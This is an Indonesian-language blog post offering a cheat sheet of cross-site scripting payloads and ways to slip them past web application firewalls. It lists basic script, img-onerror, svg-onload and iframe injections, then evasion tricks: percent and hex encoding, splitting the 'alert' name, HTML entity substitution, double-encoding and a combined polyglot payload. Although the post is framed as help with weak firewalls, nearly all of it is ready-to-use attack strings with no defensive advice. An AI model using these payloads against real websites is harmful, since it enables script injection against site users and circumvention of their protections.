Bypass WAF XSS Payloads



WAF (Web Application Firewall)

Adalah sistem keamanan yang digunakan untuk melindungi situs web dari ancaman siber seperti serangan XSS (Cross-Site Scripting). Namun, terkadang WAF gagal dalam mendeteksi dan mencegah serangan XSS. Pada artikel ini, kami akan memberikan beberapa payloads XSS dan kode bypass untuk membantu Anda mengatasi masalah WAF yang tidak efektif

Payloads XSS:
1. <script>alert('XSS')</script>
2. <img src=x onerror=alert('XSS')>
3. <b onmouseover=alert('XSS')>click here</b>
4. <iframe src="javascript:alert('XSS');"></iframe>
5. <svg onload=alert('XSS')>
6. </textarea><script>alert('XSS');</script>
7. <input type="text" value=><script>alert('XSS')</script>

Kode Bypass Payloads XSS:
Menggunakan karakter obfuscation untuk menghindari deteksi string khusus oleh WAF, seperti menggunakan %-encoding atau karakter unicode.

 
%3Cscript%3Ealert(%27XSS%27)%3C/script%3E atau \x3Cscript\x3Ealert(\x27XSS\x27)\x3C/script\x3E

1. Mengganti nama fungsi JavaScript yang digunakan dalam serangan XSS.

 
window["al"+"ert"]('XSS')

2. Menggunakan aturan yang berbeda dalam markup HTML untuk menghindari deteksi WAF.

 
<svg><scrip&#116>;alert('XSS');</script></svg>

3. Menggunakan teknik double-encoding atau encoding ganda untuk menghindari deteksi WAF

1.%253Cscript%253Ealert(%2527XSS%2527)%253C/script%253E
2.%2526%2523x3C%253Bscript%2526%2523x3E%253Balert(%2527XSS%2527)%2526%2523x3C%253B/script%2526%2523x3E%253B

4. Menggunakan teknik menggabungkan multiple paylaods yang terpisah.

 
<script>alert('XSS');</script>"><svg><scrip&#116;t>alert('XSS');</script></svg><img/src=x/onerror=alert('XSS')>

Itulah beberapa contoh payloads XSS dan kode bypass untuk mendeteksi dan melawan ancaman WAF yang kurang efektif.

0 Komentar